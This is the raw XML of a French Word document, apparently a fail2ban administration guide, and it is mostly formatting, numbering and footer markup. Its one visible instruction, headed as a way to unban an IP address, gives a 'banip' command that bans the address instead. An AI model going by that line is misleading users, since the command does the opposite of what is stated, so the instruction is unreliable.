        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AF5B62F" w14:textId="7E3748C7" w:rsidR="008C0242" w:rsidRDefault="008C0242" w:rsidP="008C0242">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Pour débannir une adresse IP :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC04DC7" w14:textId="729C0E07" w:rsidR="00B5051A" w:rsidRPr="005965DF" w:rsidRDefault="008C0242" w:rsidP="008C0242">
      <w:pPr>
        <w:pStyle w:val="CONSOLE"/>
      </w:pPr>
      <w:r w:rsidRPr="008C0242">
        <w:t xml:space="preserve">sudo fail2ban-client set sshd banip </w:t>
      </w:r>
      <w:r>
        <w:t>192.168.8.100</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00B5051A" w:rsidRPr="005965DF" w:rsidSect="00326E0E">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81D26" w14:textId="77777777" w:rsidR="005A16C0" w:rsidRDefault="005A16C0" w:rsidP="0018459A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="420317A4" w14:textId="77777777" w:rsidR="005A16C0" w:rsidRDefault="005A16C0"/>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4B991F0D" w14:textId="77777777" w:rsidR="005A16C0" w:rsidRDefault="005A16C0" w:rsidP="0018459A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4912EF" w14:textId="77777777" w:rsidR="005A16C0" w:rsidRDefault="005A1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229513"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr/>
    <w:sdtContent>
      <w:p w14:paraId="2A2C1E7E" w14:textId="56326E5B" w:rsidR="009D4907" w:rsidRDefault="009D4907">
        <w:pPr>
          <w:pStyle w:val="Pieddepage"/>
          <w:jc w:val="right"/>
        </w:pPr>
        <w:r w:rsidRPr="00655527">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00655527">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
        </w:r>
        <w:r w:rsidRPr="00655527">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="00655527">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidRPr="00655527">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="799A90D3" w14:textId="2111AEAA" w:rsidR="009D4907" w:rsidRDefault="009D4907">
    <w:pPr>
      <w:pStyle w:val="Pieddepage"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="21E62BC0" wp14:editId="5B959BE4">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="margin">
            <wp:posOffset>-495300</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>170498</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="720000" cy="374514"/>
          <wp:effectExtent l="0" t="0" r="4445" b="6985"/>
          <wp:wrapTight wrapText="bothSides">
            <wp:wrapPolygon edited="0">
              <wp:start x="2860" y="0"/>
              <wp:lineTo x="0" y="0"/>
              <wp:lineTo x="0" y="6601"/>
              <wp:lineTo x="3432" y="17603"/>
              <wp:lineTo x="3432" y="20903"/>
              <wp:lineTo x="6291" y="20903"/>
              <wp:lineTo x="21162" y="20903"/>
              <wp:lineTo x="21162" y="2200"/>
              <wp:lineTo x="20590" y="1100"/>
              <wp:lineTo x="16014" y="0"/>
              <wp:lineTo x="286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74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553EE" w14:textId="786F9C9E" w:rsidR="00B71FA2" w:rsidRPr="000322EF" w:rsidRDefault="009D4907">
    <w:pPr>
      <w:pStyle w:val="Pieddepage"/>
      <w:rPr>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="000322EF">
      <w:rPr>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t xml:space="preserve">Baptiste </w:t>
    </w:r>
    <w:r w:rsidR="006631AE" w:rsidRPr="000322EF">
      <w:rPr>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t>GUERESCHI</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="3BED610C" w14:textId="375C265B" w:rsidR="00CE2806" w:rsidRPr="00020374" w:rsidRDefault="00020374">
    <w:pPr>
      <w:rPr>
        <w:sz w:val="20"/>
        <w:szCs w:val="18"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00020374">
      <w:rPr>
        <w:sz w:val="20"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>Quentin GONCE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EE0B5" w14:textId="77777777" w:rsidR="005A16C0" w:rsidRDefault="005A16C0" w:rsidP="0018459A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DF3EC5" w14:textId="77777777" w:rsidR="005A16C0" w:rsidRDefault="005A16C0"/>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="664716BF" w14:textId="77777777" w:rsidR="005A16C0" w:rsidRDefault="005A16C0" w:rsidP="0018459A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="50407A26" w14:textId="77777777" w:rsidR="005A16C0" w:rsidRDefault="005A16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7119"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="651E9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BF08B2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A5760872"/>
    <w:lvl w:ilvl="0" w:tplc="A3FEEAC2">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41332F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6D4C5CBC"/>
    <w:lvl w:ilvl="0" w:tplc="AFE8E3EC">
      <w:start w:val="4"/>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593A24"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="667CFECA"/>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89E6108"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7C24FC0A"/>
    <w:lvl w:ilvl="0" w:tplc="1896BB00">
      <w:start w:val="4"/>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A16405"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D76E1058"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="4"/>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32E07083"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BEBE223C"/>
    <w:lvl w:ilvl="0" w:tplc="BB228C74">
      <w:start w:val="1"/>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093AB5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E65292C2"/>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0831222"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8876B0A2"/>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47E6974"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CCE62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C23839"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8E70CC0E"/>
    <w:lvl w:ilvl="0" w:tplc="46045CC0">
      <w:start w:val="1"/>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3F627B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6B6EC6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D5425DA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7E423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555A81"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="44E43A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D534B5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9C109098"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="585" w:hanging="585"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Titre2"/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Titre3"/>
      <w:lvlText w:val="%1.%2.%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="1080"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Titre4"/>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6DD1411A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F00480CE"/>
    <w:lvl w:ilvl="0" w:tplc="57DAA71C">
      <w:start w:val="2"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Abadi" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Abad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5A6C92"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F0B2A1E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16cid:durableId="1788499819">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2079663915">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="943994243">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1415317865">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1754663797">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="663974854">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="213782403">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1980068239">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1431202445">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="372854961">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="555355619">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="741564511">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1136800784">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1828861544">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1435443606">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="741368358">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1444616739">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="62484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9A"/>
    <w:rsid w:val="00007315"/>
    <w:rsid w:val="00020374"/>
    <w:rsid w:val="000277D7"/>
    <w:rsid w:val="000307EF"/>
    <w:rsid w:val="000322EF"/>
    <w:rsid w:val="00032391"/>
    <w:rsid w:val="00045EEE"/>
    <w:rsid w:val="00046046"/>
    <w:rsid w:val="00053082"/>
    <w:rsid w:val="000552B3"/>
    <w:rsid w:val="000815A8"/>
    <w:rsid w:val="00084638"/>
    <w:rsid w:val="000848BA"/>
    <w:rsid w:val="000A2A72"/>
    <w:rsid w:val="000B1D38"/>
    <w:rsid w:val="000B659E"/>
    <w:rsid w:val="000B736C"/>
    <w:rsid w:val="000D04EF"/>
    <w:rsid w:val="000D667B"/>
    <w:rsid w:val="000E1433"/>
    <w:rsid w:val="000F7C2F"/>
    <w:rsid w:val="00105707"/>
    <w:rsid w:val="00111647"/>
    <w:rsid w:val="001268FD"/>
    <w:rsid w:val="001542AC"/>
    <w:rsid w:val="0016197F"/>
    <w:rsid w:val="00162097"/>
    <w:rsid w:val="001660CE"/>
    <w:rsid w:val="0016745D"/>
    <w:rsid w:val="00170707"/>
    <w:rsid w:val="0017736A"/>
    <w:rsid w:val="0018269E"/>
    <w:rsid w:val="0018459A"/>
    <w:rsid w:val="00184EF4"/>
    <w:rsid w:val="00192403"/>
    <w:rsid w:val="001A0F06"/>
    <w:rsid w:val="001A4E7E"/>
    <w:rsid w:val="001B348C"/>
    <w:rsid w:val="001B3BF3"/>
    <w:rsid w:val="001C3E4A"/>
    <w:rsid w:val="001D179D"/>
    <w:rsid w:val="001D7C41"/>
    <w:rsid w:val="001E187A"/>
    <w:rsid w:val="001E7970"/>
    <w:rsid w:val="001F222B"/>
    <w:rsid w:val="00207EB3"/>
    <w:rsid w:val="00210EE0"/>
    <w:rsid w:val="002119F2"/>
    <w:rsid w:val="00217BEE"/>
    <w:rsid w:val="002279B2"/>
    <w:rsid w:val="00233F63"/>
    <w:rsid w:val="00234C8D"/>
    <w:rsid w:val="00235C9C"/>
    <w:rsid w:val="00246BB0"/>
    <w:rsid w:val="002524C9"/>
    <w:rsid w:val="002542D1"/>
    <w:rsid w:val="0028773D"/>
    <w:rsid w:val="00287C44"/>
    <w:rsid w:val="0029106D"/>
    <w:rsid w:val="00291FED"/>
    <w:rsid w:val="002A2702"/>
    <w:rsid w:val="002A5801"/>
    <w:rsid w:val="002A5850"/>
    <w:rsid w:val="002B0CF1"/>
    <w:rsid w:val="002B3C5C"/>
    <w:rsid w:val="002C533E"/>
    <w:rsid w:val="002D2A37"/>
    <w:rsid w:val="002D3B12"/>
    <w:rsid w:val="002E213C"/>
    <w:rsid w:val="002E3711"/>
    <w:rsid w:val="002E3872"/>
    <w:rsid w:val="002E3BB1"/>
    <w:rsid w:val="002E4118"/>
    <w:rsid w:val="002F4653"/>
    <w:rsid w:val="002F53B4"/>
    <w:rsid w:val="00322EA1"/>
    <w:rsid w:val="00326E0E"/>
    <w:rsid w:val="00330D07"/>
    <w:rsid w:val="00335AF3"/>
    <w:rsid w:val="00345C1F"/>
    <w:rsid w:val="00361DE9"/>
    <w:rsid w:val="003726CB"/>
    <w:rsid w:val="0037611C"/>
    <w:rsid w:val="00395C9B"/>
    <w:rsid w:val="003B6DC0"/>
    <w:rsid w:val="003D1A00"/>
    <w:rsid w:val="003E3BAE"/>
    <w:rsid w:val="00400808"/>
    <w:rsid w:val="004013B9"/>
    <w:rsid w:val="00410160"/>
    <w:rsid w:val="004264B3"/>
    <w:rsid w:val="00427084"/>
    <w:rsid w:val="00431F59"/>
    <w:rsid w:val="0044037D"/>
    <w:rsid w:val="0044243B"/>
    <w:rsid w:val="0045294C"/>
    <w:rsid w:val="00462356"/>
    <w:rsid w:val="00477F5D"/>
    <w:rsid w:val="004903F3"/>
    <w:rsid w:val="004926C9"/>
    <w:rsid w:val="004946D4"/>
    <w:rsid w:val="00495FF2"/>
    <w:rsid w:val="004A6AF8"/>
    <w:rsid w:val="004B29AB"/>
    <w:rsid w:val="004C3D9F"/>
    <w:rsid w:val="004C525A"/>
    <w:rsid w:val="004C5DEC"/>
    <w:rsid w:val="004D034B"/>
    <w:rsid w:val="004D51CD"/>
    <w:rsid w:val="004E2426"/>
    <w:rsid w:val="004E424A"/>
    <w:rsid w:val="004E573F"/>
    <w:rsid w:val="004F0209"/>
    <w:rsid w:val="0053351B"/>
    <w:rsid w:val="00533F0D"/>
    <w:rsid w:val="00543FBB"/>
    <w:rsid w:val="0055084E"/>
    <w:rsid w:val="00550BE8"/>
    <w:rsid w:val="00555D7B"/>
    <w:rsid w:val="00556296"/>
    <w:rsid w:val="00556491"/>
    <w:rsid w:val="0056008B"/>
    <w:rsid w:val="0059070B"/>
    <w:rsid w:val="00590E85"/>
    <w:rsid w:val="00591034"/>
    <w:rsid w:val="005965DF"/>
    <w:rsid w:val="005974A3"/>
    <w:rsid w:val="005A16C0"/>
    <w:rsid w:val="005A5AE1"/>
    <w:rsid w:val="005B3213"/>
    <w:rsid w:val="005B36C4"/>
    <w:rsid w:val="005D3DBA"/>
    <w:rsid w:val="005E3ADB"/>
    <w:rsid w:val="005E5CB0"/>
    <w:rsid w:val="005F328D"/>
    <w:rsid w:val="005F41A6"/>
    <w:rsid w:val="006012C5"/>
    <w:rsid w:val="00601B28"/>
    <w:rsid w:val="00603BEB"/>
    <w:rsid w:val="00605AD1"/>
    <w:rsid w:val="00613461"/>
    <w:rsid w:val="00620625"/>
    <w:rsid w:val="00621226"/>
    <w:rsid w:val="00637DEA"/>
    <w:rsid w:val="00641E04"/>
    <w:rsid w:val="00643427"/>
    <w:rsid w:val="00655527"/>
    <w:rsid w:val="00657A1A"/>
    <w:rsid w:val="00662F7B"/>
    <w:rsid w:val="006631AE"/>
    <w:rsid w:val="00667F6E"/>
    <w:rsid w:val="006760F2"/>
    <w:rsid w:val="006828B4"/>
    <w:rsid w:val="006878B3"/>
    <w:rsid w:val="006A28F6"/>
    <w:rsid w:val="006B58D4"/>
    <w:rsid w:val="006C1E41"/>
    <w:rsid w:val="006C4435"/>
    <w:rsid w:val="006C7664"/>
    <w:rsid w:val="006E4202"/>
    <w:rsid w:val="00701A66"/>
    <w:rsid w:val="00717C40"/>
    <w:rsid w:val="00727DDA"/>
    <w:rsid w:val="00736963"/>
    <w:rsid w:val="00737274"/>
    <w:rsid w:val="007504CC"/>
    <w:rsid w:val="00751D36"/>
    <w:rsid w:val="00753044"/>
    <w:rsid w:val="00762078"/>
    <w:rsid w:val="007632BC"/>
    <w:rsid w:val="00763452"/>
    <w:rsid w:val="00765865"/>
    <w:rsid w:val="00766355"/>
    <w:rsid w:val="00780E1B"/>
    <w:rsid w:val="00790652"/>
    <w:rsid w:val="007A1349"/>
    <w:rsid w:val="007A58BD"/>
    <w:rsid w:val="007B0402"/>
    <w:rsid w:val="007B56CC"/>
    <w:rsid w:val="007D15E4"/>
    <w:rsid w:val="007D2C74"/>
    <w:rsid w:val="007D55E4"/>
    <w:rsid w:val="007E2E3F"/>
    <w:rsid w:val="007F04FB"/>
    <w:rsid w:val="007F5F76"/>
    <w:rsid w:val="00810A3C"/>
    <w:rsid w:val="00816318"/>
    <w:rsid w:val="00822A02"/>
    <w:rsid w:val="00831044"/>
    <w:rsid w:val="00836552"/>
    <w:rsid w:val="00853622"/>
    <w:rsid w:val="0086230D"/>
    <w:rsid w:val="008666F4"/>
    <w:rsid w:val="008731A6"/>
    <w:rsid w:val="0088350E"/>
    <w:rsid w:val="00890B95"/>
    <w:rsid w:val="00897E64"/>
    <w:rsid w:val="008A51B7"/>
    <w:rsid w:val="008C0242"/>
    <w:rsid w:val="008C4C4E"/>
    <w:rsid w:val="008D37F7"/>
    <w:rsid w:val="008D520A"/>
    <w:rsid w:val="008E1DBA"/>
    <w:rsid w:val="00913B9F"/>
    <w:rsid w:val="00915DA2"/>
    <w:rsid w:val="00922990"/>
    <w:rsid w:val="0092473B"/>
    <w:rsid w:val="00925915"/>
    <w:rsid w:val="009266BF"/>
    <w:rsid w:val="009427FE"/>
    <w:rsid w:val="00945DF6"/>
    <w:rsid w:val="009513EB"/>
    <w:rsid w:val="0095315C"/>
    <w:rsid w:val="00964A5A"/>
    <w:rsid w:val="00967270"/>
    <w:rsid w:val="00975FFB"/>
    <w:rsid w:val="009778AD"/>
    <w:rsid w:val="0098758E"/>
    <w:rsid w:val="009A2084"/>
    <w:rsid w:val="009B4B3E"/>
    <w:rsid w:val="009B5FB4"/>
    <w:rsid w:val="009C1601"/>
    <w:rsid w:val="009D197D"/>
    <w:rsid w:val="009D28AE"/>
    <w:rsid w:val="009D3FF5"/>
    <w:rsid w:val="009D4907"/>
    <w:rsid w:val="009D4BB4"/>
    <w:rsid w:val="009E32C1"/>
    <w:rsid w:val="00A008B0"/>
    <w:rsid w:val="00A04581"/>
    <w:rsid w:val="00A10CC8"/>
    <w:rsid w:val="00A11143"/>
    <w:rsid w:val="00A137F8"/>
    <w:rsid w:val="00A13C31"/>
    <w:rsid w:val="00A40FC7"/>
    <w:rsid w:val="00A54597"/>
    <w:rsid w:val="00A54D6B"/>
    <w:rsid w:val="00A66602"/>
    <w:rsid w:val="00A83ECF"/>
    <w:rsid w:val="00A942EF"/>
    <w:rsid w:val="00A950B6"/>
    <w:rsid w:val="00AA6ECC"/>
    <w:rsid w:val="00AB51BE"/>
    <w:rsid w:val="00AB7820"/>
    <w:rsid w:val="00AC66C2"/>
    <w:rsid w:val="00AD2651"/>
    <w:rsid w:val="00AD4CE6"/>
    <w:rsid w:val="00AE429A"/>
    <w:rsid w:val="00AE684D"/>
    <w:rsid w:val="00AF77BC"/>
    <w:rsid w:val="00B04749"/>
    <w:rsid w:val="00B123A6"/>
    <w:rsid w:val="00B12BF8"/>
    <w:rsid w:val="00B148AF"/>
    <w:rsid w:val="00B255A1"/>
    <w:rsid w:val="00B2578A"/>
    <w:rsid w:val="00B278F6"/>
    <w:rsid w:val="00B427AC"/>
    <w:rsid w:val="00B45DA6"/>
    <w:rsid w:val="00B5051A"/>
    <w:rsid w:val="00B543D8"/>
    <w:rsid w:val="00B71FA2"/>
    <w:rsid w:val="00B913CF"/>
    <w:rsid w:val="00B92106"/>
    <w:rsid w:val="00B9236C"/>
    <w:rsid w:val="00B9238A"/>
    <w:rsid w:val="00BA0C7E"/>
    <w:rsid w:val="00BA644D"/>
    <w:rsid w:val="00BB3CD9"/>
    <w:rsid w:val="00BC0544"/>
    <w:rsid w:val="00BC4025"/>
    <w:rsid w:val="00BC6A22"/>
    <w:rsid w:val="00BE422E"/>
    <w:rsid w:val="00BE5BD9"/>
    <w:rsid w:val="00BE638D"/>
    <w:rsid w:val="00C03672"/>
    <w:rsid w:val="00C03795"/>
    <w:rsid w:val="00C23BD9"/>
    <w:rsid w:val="00C24AD0"/>
    <w:rsid w:val="00C262EC"/>
    <w:rsid w:val="00C26FCE"/>
    <w:rsid w:val="00C36276"/>
    <w:rsid w:val="00C41577"/>
    <w:rsid w:val="00C53322"/>
    <w:rsid w:val="00C54ECE"/>
    <w:rsid w:val="00C6209E"/>
    <w:rsid w:val="00C71C63"/>
    <w:rsid w:val="00C86095"/>
    <w:rsid w:val="00CA0A55"/>
    <w:rsid w:val="00CA321E"/>
    <w:rsid w:val="00CA6B54"/>
    <w:rsid w:val="00CC4A73"/>
    <w:rsid w:val="00CD1C52"/>
    <w:rsid w:val="00CD6AE9"/>
    <w:rsid w:val="00CE2806"/>
    <w:rsid w:val="00CF160A"/>
    <w:rsid w:val="00CF4EA5"/>
    <w:rsid w:val="00CF59BE"/>
    <w:rsid w:val="00D03120"/>
    <w:rsid w:val="00D05F8B"/>
    <w:rsid w:val="00D116C5"/>
    <w:rsid w:val="00D15A91"/>
    <w:rsid w:val="00D162BA"/>
    <w:rsid w:val="00D21EF7"/>
    <w:rsid w:val="00D30688"/>
    <w:rsid w:val="00D31258"/>
    <w:rsid w:val="00D347BE"/>
    <w:rsid w:val="00D36D5E"/>
    <w:rsid w:val="00D4463D"/>
    <w:rsid w:val="00D45947"/>
    <w:rsid w:val="00D55E14"/>
    <w:rsid w:val="00D643E9"/>
    <w:rsid w:val="00D713D1"/>
    <w:rsid w:val="00D7432D"/>
    <w:rsid w:val="00D91398"/>
    <w:rsid w:val="00D93609"/>
    <w:rsid w:val="00DA6240"/>
    <w:rsid w:val="00DB30C2"/>
    <w:rsid w:val="00DB310D"/>
    <w:rsid w:val="00DC0322"/>
    <w:rsid w:val="00DC1B2E"/>
    <w:rsid w:val="00DD0E02"/>
    <w:rsid w:val="00DE7DD0"/>
    <w:rsid w:val="00DF4F31"/>
    <w:rsid w:val="00E078C4"/>
    <w:rsid w:val="00E14CA6"/>
    <w:rsid w:val="00E27F81"/>
    <w:rsid w:val="00E33E05"/>
    <w:rsid w:val="00E421BE"/>
    <w:rsid w:val="00E513B3"/>
    <w:rsid w:val="00E63F8B"/>
    <w:rsid w:val="00E67504"/>
    <w:rsid w:val="00E67A18"/>
    <w:rsid w:val="00E72592"/>
    <w:rsid w:val="00E76CE2"/>
    <w:rsid w:val="00E858FE"/>
    <w:rsid w:val="00E964D0"/>
    <w:rsid w:val="00E97BEE"/>
    <w:rsid w:val="00EB3BC5"/>
    <w:rsid w:val="00ED0EEC"/>
    <w:rsid w:val="00ED3856"/>
    <w:rsid w:val="00EF313B"/>
    <w:rsid w:val="00F01136"/>
    <w:rsid w:val="00F0664D"/>
    <w:rsid w:val="00F1460E"/>
    <w:rsid w:val="00F16F49"/>
    <w:rsid w:val="00F219EB"/>
    <w:rsid w:val="00F22B8F"/>
    <w:rsid w:val="00F50117"/>
    <w:rsid w:val="00F5095C"/>
    <w:rsid w:val="00F627E8"/>
    <w:rsid w:val="00F74FE3"/>
    <w:rsid w:val="00F758B0"/>
    <w:rsid w:val="00F86301"/>
    <w:rsid w:val="00F86809"/>
    <w:rsid w:val="00F9356B"/>
    <w:rsid w:val="00F95EE5"/>
    <w:rsid w:val="00FA2AEE"/>
    <w:rsid w:val="00FA7A75"/>
    <w:rsid w:val="00FC3EB9"/>
    <w:rsid w:val="00FC4774"/>
    <w:rsid w:val="00FD07F7"/>
    <w:rsid w:val="00FD4B07"/>
    <w:rsid w:val="00FD5B07"/>
    <w:rsid w:val="00FE6B80"/>
    <w:rsid w:val="00FE7A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B77EC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{627F65DD-9367-4B22-95EE-60B85651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21E"/>
    <w:pPr>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Titre1Car"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00FC4774"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:shd w:val="clear" w:color="auto" w:fill="0070C0"/>
      <w:spacing w:before="240" w:after="0"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Paragraphedeliste"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Titre2Car"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00F16F49"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FFC000"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="32"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Titre3Car"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0044243B"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="28"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Paragraphedeliste"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Titre4Car"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="002E3872"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
